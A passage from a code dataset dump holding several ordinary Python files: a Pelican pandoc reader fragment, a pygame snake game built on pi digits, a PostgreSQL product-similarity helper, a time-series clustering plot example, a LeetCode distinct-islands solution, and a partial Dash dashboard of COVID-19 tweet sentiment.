proc.wait()\n if status:\n raise subprocess.CalledProcessError(status, pandoc_cmd)\n\n # Need that to make {static} -like tags be available\n output = output.replace(\"%7B\", \"{\")\n output = output.replace(\"%7D\", \"}\")\n\n return output, finalmeta\n\ndef add_reader(readers):\n for ext in PandocReader.file_extensions:\n readers.reader_classes[ext] = PandocReader\n\ndef register():\n signals.readers_init.connect(add_reader)\n","sub_path":"pandoc_reader.py","file_name":"pandoc_reader.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"567867657","text":"import pygame\nfrom letters import numSelect\nimport random\n\npygame.init()\n\n# RGB Colors\nblack = (0,0,0)\nwhite = (255,255,255)\n\ndisplay_width, display_height = 1000, 500\n\n#create main game frame \ngameDisplay = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption('PITHON')\nclock = pygame.time.Clock()\ncrashed = False\n\n#set count to 0\ncount = 0\n\n\n\ndef numDisplay(number, x, y):\n gameDisplay.blit(number, (x, y))\n\ndef score(count):\n font = pygame.font.SysFont(None, 25)\n text = font.render(\"Score: \" +str(count), True, black)\n gameDisplay.blit(text, [display_width/2,25])\n \ndef pithon():\n#sets image width\n number_width = 50\n#initial number starting position\n image_x, image_y = display_width/2, display_height/2\n pi_string = [\"images/three.png\",\"images/one.png\",\"images/four.png\"]\n snake_position = [[image_x, image_y], [image_x, image_y], [image_x+number_width, image_y]]\n x_change, y_change = -50, 0\n#determines starting position in array to pull from letters\n count = 2\n randCount = random.randrange(1,9)\n while randCount == count:\n randCount = random.randrange(1,9)\n#determines starting food position\n food_x, food_y = random.randrange(number_width,display_width-number_width,number_width), random.randrange(number_width,display_height-number_width,number_width)\n rfood_x, rfood_y = random.randrange(number_width,display_width-number_width,number_width), random.randrange(number_width,display_height-number_width,number_width)\n crashed = False\n\n\n while not crashed:\n#allows the user to quit the game\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n\n#makes the frame background white\n gameDisplay.fill(white)\n#sets initial game score\n score(count-2)\n\n#creates next snake body part on screen\n food = numSelect()\n numDisplay(pygame.image.load(food.piDigit(count+1)), food_x, food_y)\n \n#creates fake snake body part on screen\n snakefood = numSelect()\n numDisplay(pygame.image.load(snakefood.piDigit(randCount)), rfood_x, rfood_y)\n\n#generates snake body\n [numDisplay(pygame.image.load(pi_string[x]), snake_position[x][0], snake_position[x][1]) for x in range(1,len(pi_string))] \n\n#creates user controls\n\n \n if event.type == pygame.KEYDOWN:\n \n if event.key == pygame.K_LEFT and x_change == 0:\n x_change = -number_width\n y_change = 0\n elif event.key == pygame.K_RIGHT and x_change == 0:\n x_change = number_width\n y_change = 0\n elif event.key == pygame.K_UP and y_change == 0:\n y_change = -number_width\n x_change = 0\n elif event.key == pygame.K_DOWN and y_change == 0:\n y_change = number_width\n x_change = 0\n\n snake_position[0][0] += x_change\n snake_position[0][1] += y_change\n\n#for loop to shift everything up one\n\n for x in reversed(range(1,len(pi_string))):\n snake_position[x][0] = snake_position[x-1][0]\n snake_position[x][1] = snake_position[x-1][1]\n \n#if statement to detect food collision\n if food_x == snake_position[0][0] and food_y == snake_position[0][1]:\n count +=1\n randCount = random.randrange(1,9)\n food_x, food_y = -100, -100\n pi_string.append(food.piDigit(count))\n snake_position.append([food_x,food_y])\n# y_position.append(food_y)\n food_x = random.randrange(number_width*2,display_width-number_width*2,number_width)\n food_y = random.randrange(number_width*2,display_height-number_width*2,number_width)\n rfood_x, rfood_y = random.randrange(number_width,display_width-number_width,number_width), random.randrange(number_width,display_height-number_width,number_width) \n while [food_x,food_y] in snake_position:\n food_x = random.randrange(number_width*2,display_width-number_width*2, number_width)\n food_y = random.randrange(number_width*2,display_height-number_width*2, number_width)\n rfood_x, rfood_y = random.randrange(number_width,display_width-number_width,number_width), random.randrange(number_width,display_height-number_width,number_width)\n while randCount == count:\n randCount = random.randrange(1,9)\n\n\n#draws snake head\n numDisplay(pygame.image.load(pi_string[0]), snake_position[0][0], snake_position[0][1])\n\n#ends game if snake hits edge\n\n if snake_position[0][0] > display_width-number_width or snake_position[0][0] < 0+number_width or snake_position[0][1] > display_height-number_width or snake_position[0][1] < 0+number_width:\n crashed = True\n \n if snake_position[0] in snake_position[2:]:\n crashed = True\n\n if snake_position[0] in [rfood_x, rfood_y]:\n crashed = True\n\n#these two statements need to be at the end of the pithon definition\n\n pygame.display.update()\n clock.tick(7)\n\npithon()\n#specific method to quit pygame\npygame.quit()\nquit()\n","sub_path":"pithon.py","file_name":"pithon.py","file_ext":"py","file_size_in_byte":5237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"132036258","text":"import psycopg2\nfrom psycopg2.extras import DictCursor\nimport os \n\n\nclass Data:\n\n def __init__(self):\n self.connection_string = os.environ.get('PSQL_CONNECTION_STRING', False)\n self.conn = psycopg2.connect(self.connection_string)\n self.cursor = self.conn.cursor(cursor_factory=DictCursor)\n\n def get_live_products(self):\n query = \"\"\"\n select product_id,\n Image as fname \n from product_productimage pi\n inner join product_product p\n on p.id = pi.product_id\n where sort_order = 0\n and image not like '%na_image%'\n \"\"\"\n self.cursor.execute(query)\n result = list()\n for row in self.cursor:\n result.append({'id':row[0], 'fname':row[1]})\n return result\n\n def clear_similarity_table(self):\n cursor = self.conn.cursor()\n query = \"\"\"\n truncate product_productsimilarity;\n \"\"\"\n cursor.execute(query)\n self.conn.commit()\n\n def save_similarities(self, distances):\n cursor = self.conn.cursor()\n insert_query = 'insert into \\\n product_productsimilarity \\\n (product_id, similar_products) values %s'\n psycopg2.extras.execute_values (\n cursor, \n insert_query, \n distances, \n template=None, \n page_size=100\n )\n self.conn.commit()\n\n def close_connections(self):\n self.conn.close()","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"614774671","text":"#!/usr/bin/env python\n\n\"\"\"\nThis implements a time Warping example\n\"\"\"\nimport os,sys,inspect\nimport numpy as np\nfrom sklearn import mixture\nfrom sklearn.externals.six.moves import xrange\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0,parentdir) \nfrom tsc import *\n\n# Number of samples per component\nn_samples = 100\n\n# Generate random sample following a sine curve\nnp.random.seed(0)\nX = np.zeros((n_samples, 2))\nstep = 4 * np.pi / n_samples\n\nfor i in xrange(X.shape[0]):\n\tx = i * step - 6\n\tX[i, 0] = x + np.random.normal(0, 0.15)\n\tX[i, 1] = 3 * (np.sinc(x) + np.random.normal(0, .15))\n\n\n# Number of samples per component\nn_samples = 200\n\n# Generate random sample following a sine curve\nnp.random.seed(0)\nY = np.zeros((n_samples, 2))\nstep = 4 * np.pi / n_samples\n\nfor i in xrange(Y.shape[0]):\n\tx = i * step - 6\n\tY[i, 0] = x + np.random.normal(0, 0.15)\n\tY[i, 1] = 2 * (np.sinc(x) + np.random.normal(0, .15))\n\n\t\t\na = TransitionStateClustering(window_size=2)\na.addDemonstration(X)\na.addDemonstration(Y)\na.fit(normalize=True)\n\nplt.subplot(1,2,1)\nplt.scatter(X[:,0], X[:,1], color='b')\nplt.scatter(Y[:,0], Y[:,1], color='r')\nplt.scatter(X[a.segmentation[0],0], X[a.segmentation[0],1], s=100,color='k')\nplt.scatter(Y[a.segmentation[1],0], Y[a.segmentation[1],1], s=100,color='k')\n\nplt.xlim(-8, 4 * np.pi - 6+2)\nplt.ylim(-5, 5)\nplt.title(\"TSC With RBF Normalization\")\n\na = TransitionStateClustering(window_size=2)\na.addDemonstration(X)\na.addDemonstration(Y)\na.fit(normalize=False)\n\nplt.subplot(1,2,2)\nplt.scatter(X[:,0], X[:,1], color='b')\nplt.scatter(Y[:,0], Y[:,1], color='r')\nplt.scatter(X[a.segmentation[0],0], X[a.segmentation[0],1], s=100,color='k')\nplt.scatter(Y[a.segmentation[1],0], Y[a.segmentation[1],1], s=100,color='k')\n\nplt.xlim(-8, 4 * np.pi - 6+2)\nplt.ylim(-5, 5)\nplt.title(\"TSC Without RBF Normalization\")\nplt.show()","sub_path":"tsc/examples/timeWarp.py","file_name":"timeWarp.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"585127532","text":"'''\n694. Number of Distinct Islands\n\nGiven a non-empty 2D array grid of 0's and 1's, an island is a group of 1's (representing land) connected 4-directionally (horizontal or vertical.) You may assume all four edges of the grid are surrounded by water.\n\nCount the number of distinct islands. An island is considered to be the same as another if and only if one island can be translated (and not rotated or reflected) to equal the other.\n\nExample 1:\n11000\n11000\n00011\n00011\nGiven the above grid map, return 1.\nExample 2:\n11011\n10000\n00001\n11011\nGiven the above grid map, return 3.\n\nNotice that:\n11\n1\nand\n 1\n11\nare considered different island shapes, because we do not consider reflection / rotation.\nNote: The length of each dimension in the given grid does not exceed 50.\n'''\n\nclass Solution(object):\n def numDistinctIslands(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n # Best solution:\n # m, n = len(grid), len(grid[0])\n # def dfs(i, j, posr, posc):\n # coord.append((posr, posc))\n # grid[i][j] = 0\n # if i < m - 1 and grid[i + 1][j]:\n # dfs(i + 1, j, posr + 1, posc)\n # if i > 0 and grid[i - 1][j]:\n # dfs(i - 1, j, posr - 1, posc)\n # if j < n - 1 and grid[i][j + 1]:\n # dfs(i, j + 1, posr, posc + 1)\n # if j > 0 and grid[i][j - 1]:\n # dfs(i, j - 1, posr, posc - 1)\n # d = collections.Counter()\n # for i in xrange(m):\n # for j in xrange(n):\n # if grid[i][j]:\n # coord = []\n # dfs(i, j, 0, 0)\n # d[tuple(coord)]+=1\n # return len(d)\n \n \n # Better solution:\n # numrows, numcols = len(grid), len(grid[0])\n # def expand(x, y):\n # if 0 <= x < numrows and 0 <= y < numcols and grid[x][y] == 1:\n # grid[x][y] = 0\n # d = \"d\"+expand(x-1,y)\n # u = \"u\"+expand(x+1,y)\n # l = \"l\"+expand(x,y-1)\n # r = \"r\"+expand(x,y+1)\n # return d+u+l+r\n # return \"\"\n # islands = set() \n # for i in range(numrows):\n # for j in range(numcols):\n # if grid[i][j] == 1:\n # islands.add(expand(i,j))\n # return len(islands)\n \n \n if not grid:\n return 0\n m,n = len(grid),len(grid[0])\n \n shapes = []\n res = 0\n for i in range(m):\n for j in range(n):\n if grid[i][j] == 1:\n shape = []\n self.dfs(grid, i, j, shape)\n if not shape in shapes:\n res += 1\n shapes.append(shape)\n return res\n \n def dfs(self, grid, i, j, shape):\n # print i, j\n grid[i][j] = 0\n \n if i+1 < len(grid) and grid[i+1][j] == 1:\n shape.append('d')\n self.dfs(grid, i+1, j, shape)\n if j+1 < len(grid[0]) and grid[i][j+1] == 1:\n shape.append('r')\n self.dfs(grid, i, j+1, shape)\n if i-1 >= 0 and grid[i-1][j] == 1:\n shape.append('u')\n self.dfs(grid, i-1, j, shape)\n if j-1 >= 0 and grid[i][j-1] == 1:\n shape.append('l')\n self.dfs(grid, i, j-1, shape)\n shape.append('b')\n","sub_path":"694_NumberOfDistinctIslands.py","file_name":"694_NumberOfDistinctIslands.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"147258063","text":"import os\r\nimport pathlib\r\n\r\nimport dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output, State\r\nimport dash_table\r\nimport plotly.graph_objs as go\r\nimport plotly.express as px\r\nfrom plotly.subplots import make_subplots\r\nimport dash_daq as daq\r\n\r\nfrom datetime import datetime as dt\r\nimport pandas as pd\r\n\r\napp = dash.Dash(\r\n __name__,\r\n meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=1\"}],\r\n)\r\napp.title = 'COVID Tweets Sentiment Dashboard'\r\nserver = app.server\r\napp.config[\"suppress_callback_exceptions\"] = True\r\n\r\nAPP_PATH = str(pathlib.Path(__file__).parent.resolve())\r\n\r\ndf_day = pd.read_csv(os.path.join(APP_PATH, os.path.join(\"data\", \"day_wise.csv\")))\r\ndf_day['date'] = pd.to_datetime(df_day['date'])\r\n#df_day.set_index('date', inplace=True)\r\n#df_day.index = pd.to_datetime(df_day.index)\r\ndf_day= df_day.sort_values(by='date')\r\n\r\ndf_phase = pd.read_csv(os.path.join(APP_PATH, os.path.join(\"data\", \"phase_wise.csv\")))\r\n#df_phase.set_index('phase', inplace=True)\r\ndf_phase['start'] = pd.to_datetime(df_phase['start'])\r\ndf_phase['end'] = pd.to_datetime(df_phase['end'])\r\ndf_phase['date_mpos'] = pd.to_datetime(df_phase['date_mpos'])\r\ndf_phase['date_mneg'] = pd.to_datetime(df_phase['date_mneg'])\r\ndf_phase= df_phase.sort_values(by='start')\r\nphases = ['Lockdown 1', 'Lockdown 2', 'Lockdown 3', 'Lockdown 4', 'Unlock 1', 'Unlock 2']\r\nvals = [0,1,2,3,4,5]\r\n\r\ndef build_banner():\r\n return html.Div(\r\n id=\"banner\",\r\n className=\"banner\",\r\n children=[\r\n html.Div(\r\n id=\"banner-text\",\r\n children=[\r\n html.H5(\"SENTIMENT ANALYSIS OF COVID-19 TWEETS\"),\r\n html.H6(\"Infering people's daily reactions and with various phases of lockdown\"),\r\n ],\r\n ),\r\n html.Div(\r\n id=\"banner-logo\",\r\n children=[\r\n html.Button(\r\n id=\"learn-more-button\", children=\"KNOW MORE ABOUT THE PROJECT\", n_clicks=0\r\n ),\r\n html.Img(id=\"logo\", src=app.get_asset_url(\"Logo.png\")),\r\n ],\r\n ),\r\n ],\r\n )\r\n\r\n\r\ndef build_tabs():\r\n return html.Div(\r\n id=\"tabs\",\r\n className=\"tabs\",\r\n children=[\r\n dcc.Tabs(\r\n id=\"app-tabs\",\r\n value=\"tab1\",\r\n className=\"custom-tabs\",\r\n children=[\r\n dcc.Tab(\r\n id=\"day-tab\",\r\n label=\"day wise statistics dashboard\",\r\n value=\"tab1\",\r\n className=\"custom-tab\",\r\n selected_className=\"custom-tab--selected\",\r\n ),\r\n dcc.Tab(\r\n id=\"phase-tab\",\r\n label=\"phase wise statistics Dashboard\",\r\n value=\"tab2\",\r\n className=\"custom-tab\",\r\n selected_className=\"custom-tab--selected\",\r\n ),\r\n ],\r\n )\r\n ],\r\n )\r\n\r\n\r\ndef generate_daywiseplot():\r\n df = df_day\r\n fig = make_subplots(rows=3, cols=1,\r\n shared_xaxes=True)\r\n fig.add_trace(go.Scatter(x = df['date'], y = df['pos'],\r\n mode='lines+markers',\r\n name = 'pos',\r\n connectgaps=True, marker_color='rgb(35,132,67)'),\r\n row=1, col=1)\r\n fig.add_trace(go.Scatter(x = df['date'], y = df['neg'],\r\n mode='lines+markers',\r\n name = 'neg',\r\n connectgaps=True, marker_color='rgb(244,59,44)'),\r\n row=2, col=1)\r\n fig.add_trace(go.Scatter(x = df['date'], y = df['neut'],\r\n mode='lines+markers',\r\n name = 'neut',\r\n connectgaps=True, marker_color='rgb(62,83,160)'),\r\n row=3, col=1)\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n height = 500,\r\n legend=dict(\r\n orientation=\"h\",\r\n yanchor=\"bottom\", y=1.02,\r\n xanchor=\"right\", x=1),\r\n title={\r\n 'text': \"Count of COVID19 Tweets Sentiment Wise per day\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'},\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n )\r\n fig.update_xaxes(showline=False, linewidth=2,showticklabels=False,\r\n #ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10,\r\n showgrid = False, zeroline=False, row=1, col=1)\r\n fig.update_xaxes(showline=False, linewidth=2,showticklabels=False,\r\n #ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10,\r\n showgrid = False, zeroline=False, row=2, col=1)\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10,\r\n title_text='Date', title_standoff=10, matches='x',\r\n showgrid = False, zeroline=False, row=3, col=1)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n showgrid=False, zeroline=False, row=1, col=1)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n showgrid=False, zeroline=False, row=2, col=1)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n showgrid=False, zeroline=False, row=3, col=1)\r\n return dcc.Graph(\r\n id=\"daywiseplot\", responsive=True,\r\n figure = fig)\r\n\r\ndef generate_totplot():\r\n fig = go.Figure()\r\n fig.add_trace(go.Scatter(x=df_day['date'], y =df_day['tot'],\r\n mode='lines+markers',\r\n connectgaps=True, marker_color='rgb(135,44,162)'\r\n )\r\n )\r\n\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': \"Total Count of COVID19 Tweets per day\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10,\r\n title_text='Date', title_standoff=10,\r\n #rangeslider_visible=True\r\n )\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n title_text='Count of COVID-19 realted tweets', title_standoff=25)\r\n #fig.update_xaxes(rangeslider_visible=True)\r\n\r\n #fig.update_layout(xaxis_range=['2020-03-21',])\r\n return dcc.Graph(\r\n id=\"totplot\", responsive=True,\r\n figure = fig)\r\n\r\ndef generate_scoreplot():\r\n df = df_day\r\n fig = go.Figure()\r\n fig.add_trace(go.Scatter(x=df['date'], y = df['avg'],\r\n mode='lines+markers',\r\n connectgaps=True, marker_color='rgb(135,44,162)'))\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': \"Sentiment Score of COVID19 Tweets per day\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10,\r\n title_text='Date', title_standoff=15,\r\n rangeslider_visible=True)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n title_text='Sentiment Score', title_standoff=25,\r\n zeroline=True, zerolinewidth=2, zerolinecolor='Red')\r\n\r\n return dcc.Graph(\r\n id=\"scoreplot\", responsive=True,\r\n figure = fig)\r\n\r\ndef generate_barplot():\r\n fig = go.Figure()\r\n fig.add_trace(go.Bar(\r\n x=df_phase['phase'], y=df_phase['neg'],\r\n name='Negative Tweets',\r\n marker_color='rgb(244,59,44)'\r\n ))\r\n fig.add_trace(go.Bar(\r\n x=df_phase['phase'], y=df_phase['pos'],\r\n name='Positive Tweets',\r\n marker_color='rgb(35,132,67)'\r\n ))\r\n fig.add_trace(go.Bar(\r\n x=df_phase['phase'], y=df_phase['neut'],\r\n name='Neutral Tweets',\r\n marker_color='rgb(62,83,160)'\r\n ))\r\n\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n barmode='group', xaxis_tickangle=-45,\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n height = 800,\r\n legend=dict(\r\n orientation=\"h\",\r\n yanchor=\"bottom\", y=1.02,\r\n xanchor=\"right\", x=1),\r\n title={\r\n 'text': \"Count of COVID19 Tweets Sentiment Wise per Phase\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'},\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n )\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n title_text='Phase', title_standoff=10,\r\n #rangeslider_visible=True\r\n )\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n title_text='Count of COVID-19 tweets', title_standoff=25)\r\n #fig.update_xaxes(rangeslider_visible=True)\r\n\r\n #fig.update_layout(xaxis_range=['2020-03-21',])\r\n return dcc.Graph(\r\n id=\"barplot\", responsive=True,\r\n figure = fig)\r\n\r\ndef generate_c1plot():\r\n df = df_phase\r\n fig = go.Figure()\r\n fig.add_trace(go.Scatter(x=df['phase'], y = df['avg'],\r\n mode='lines+markers',\r\n connectgaps=True, marker_color='rgb(135,44,162)'))\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': \"Sentiment Score of COVID19 Tweets Phase-wise\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10, tickangle=-45,\r\n title_text='Phase', title_standoff=15,\r\n rangeslider_visible=False)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n title_text='Sentiment Score', title_standoff=25,\r\n zeroline=True, zerolinewidth=2, zerolinecolor='Red')\r\n\r\n return dcc.Graph(\r\n id=\"c1plot\", responsive=True,\r\n figure = fig)\r\n\r\ndef generate_c2plot():\r\n df = df_phase\r\n fig = go.Figure()\r\n fig.add_trace(go.Scatter(x=df['phase'], y = df['p/n'],\r\n mode='lines+markers',\r\n connectgaps=True, marker_color='rgb(135,44,162)'))\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': \"P/N Ratio Phase-wise\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10, tickangle=-45,\r\n title_text='Phase', title_standoff=15,\r\n rangeslider_visible=False)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n title_text='P/N Ratio', title_standoff=25,\r\n zeroline=True, zerolinewidth=2, zerolinecolor='Red')\r\n\r\n return dcc.Graph(\r\n id=\"c2plot\", responsive=True,\r\n figure = fig)\r\n\r\n\r\n\r\ndef build_tab_1():\r\n return [\r\n # day wise statistics\r\n html.Div(\r\n id='daywiseplot',\r\n className='daywiseplot',\r\n children=[\r\n html.Div(\r\n className=\"row\",\r\n children=[\r\n # Column for user controls\r\n html.Div(\r\n className=\"four columns div-user-controls\",\r\n children=[\r\n html.H2(\"SINGLE DAY SUMMARY\"),\r\n html.P(\r\n \"\"\"Select a particular day using the date picker\r\n for viewing specific summary and statistics.\"\"\"\r\n ),\r\n html.Div(\r\n className=\"div-for-dropdown\",\r\n children=[\r\n dcc.DatePickerSingle(\r\n id=\"date-picker\",\r\n min_date_allowed=dt(2020, 3, 21),\r\n max_date_allowed=dt(2020, 7, 12),\r\n initial_visible_month=dt(2020, 3, 21),\r\n date=dt(2020, 3, 21).date(),\r\n display_format=\"MMMM D, YYYY\",\r\n style={\"border\": \"0px solid black\"}\r\n )\r\n ]\r\n )\r\n ]\r\n ),\r\n # Column for app graphs and plots\r\n html.Div(\r\n className=\"eight columns div-for-charts bg-grey\",\r\n children=[\r\n dcc.Graph(id='piechart', responsive=True),\r\n html.Div(id='daystats', className='daystats')\r\n ]\r\n )\r\n ]\r\n ),\r\n html.Div(\r\n className='totplot',\r\n children=[generate_totplot()]\r\n ),\r\n html.Div(\r\n className='daywiseplot',\r\n children=[generate_daywiseplot()]\r\n ),\r\n html.Div(\r\n className='scoreplot',\r\n children=[generate_scoreplot()]\r\n )\r\n ]\r\n )\r\n ]\r\n\r\ndef build_tab_2():\r\n return [\r\n # day wise statistics\r\n html.Div(\r\n id='phasewiseplot',\r\n className='phasewiseplot',\r\n children=[\r\n html.Div(\r\n className=\"row\",\r\n children=[\r\n # Column for user controls\r\n html.Div(\r\n className=\"four columns div-user-controls\",\r\n children=[\r\n html.H2(\"SINGLE PHASE SUMMARY\"),\r\n html.P(\r\n \"\"\"Select a particular phase using the dropdown\r\n for viewing specific summary and statistics.\"\"\"\r\n ),\r\n html.Div(\r\n className=\"div-for-dropdown\",\r\n children=[\r\n dcc.Dropdown(\r\n id=\"phase-dropdown\",\r\n options=[\r\n {\"label\": i, \"value\": j}\r\n for (i,j) in zip(phases, vals)\r\n ],\r\n value=0,\r\n placeholder=\"Select a Phase\",\r\n clearable=False\r\n )\r\n ]\r\n )\r\n ]\r\n ),\r\n # Column for app graphs and plots\r\n html.Div(\r\n className=\"eight columns div-for-charts bg-grey\",\r\n children=[\r\n dcc.Graph(id=\"pie-graph\", className='pie-graph'),\r\n html.Div(id='phasestats', className='phasestats')\r\n ]\r\n )\r\n ]\r\n ),\r\n html.Div(\r\n className='barplot',\r\n children=[generate_barplot()]\r\n ),\r\n html.Div(\r\n className='row', id='twoplots',\r\n children=[\r\n html.Div(\r\n className='six columns',\r\n children=[\r\n html.Div(className='c1',\r\n children=[html.H3('Sentiment Score Phase-wise')]),\r\n generate_c1plot()\r\n ]),\r\n html.Div(\r\n className='six columns',\r\n children=[\r\n html.Div(className='c2',\r\n children=[html.H3('P/N Ratio Phase-wise')]),\r\n generate_c2plot()\r\n ])\r\n ])\r\n ])\r\n ]\r\n\r\ndef generate_modal():\r\n return html.Div(\r\n id=\"markdown\",\r\n className=\"modal\",\r\n children=(\r\n html.Div(\r\n id=\"markdown-container\",\r\n className=\"markdown-container\",\r\n children=[\r\n html.Div(\r\n className=\"close-container\",\r\n children=html.Button(\r\n \"Close\",\r\n id=\"markdown_close\",\r\n n_clicks=0,\r\n className=\"closeButton\",\r\n ),\r\n ),\r\n html.Div(\r\n className=\"markdown-text\",\r\n children=dcc.Markdown(\r\n children=(\r\n \"\"\"\r\n #### **ABOUT PROJECT**\r\n\r\n This is a dashboard for monitoring sentiment of COVID19 related tweets. It is a webapp built using [dash](https://plotly.com/dash/). This project is hosted [here](https://github.com/SmartPracticeschool/SBSPS-Challenge-4564-Sentiment-Analysis-Dashboard-of-COVID-19-tweets). One can build it locally also by cloning the repository.\r\n\r\n > ###### This project is part of [**IBM HACK CHALLENGE 2020**](https://smartinternz.com/ibm-hack-challenge-2020).\r\n\r\n ###### How to Use:\r\n * Phases in app means various phases of lockdown exercised as mentioned [here]().\r\n * p/n ratio denotes count of positive tweets per negative tweet.\r\n * You may encounter following abbreviations:\r\n * pos stands for Positive\r\n * neg stands for Negative\r\n * neut stands for Neutral\r\n\r\n\r\n ###### Following issues still exist with the project (sorry for your inconvenience):\r\n * Due to inavailability of twitter API, this does not updates in real time and data is taken from web.\r\n * As there is no automated script yet, this app would be updated per week manually.\r\n * This app is not fully responsive yet for all the screen sizes.\r\n\r\n > ###### Data Source: Data used in the app can be found [here](https://ieee-dataport.org/open-access/coronavirus-covid-19-tweets-dataset). It is processed using [these scripts](https://github.com/SmartPracticeschool/SBSPS-Challenge-4564-Sentiment-Analysis-Dashboard-of-COVID-19-tweets/tree/master/data_preprocessing).\r\n\r\n #### Connect with me:\r\n * [**Github**](https://github.com/avats-dev)\r\n * [**LinkedIn**](https://www.linkedin.com/in/avats-dev/)\r\n * [**Gmail**](mailto:avats.dev@gmail.com)\r\n\r\n > _**Feel free to drop feedback and suggestions !!**_\r\n\r\n \"\"\"\r\n )\r\n ),\r\n ),\r\n ],\r\n )\r\n ),\r\n )\r\n\r\n\r\n\r\napp.layout = html.Div(\r\n id=\"big-app-container\",\r\n children=[\r\n build_banner(),\r\n html.Div(\r\n id=\"app-container\",\r\n children=[\r\n build_tabs(),\r\n # Main app\r\n html.Div(id=\"app-content\"),\r\n ],\r\n ),\r\n #dcc.Store(id=\"value-setter-store\", data=init_value_setter_store()),\r\n dcc.Store(id=\"n-interval-stage\", data=50),\r\n 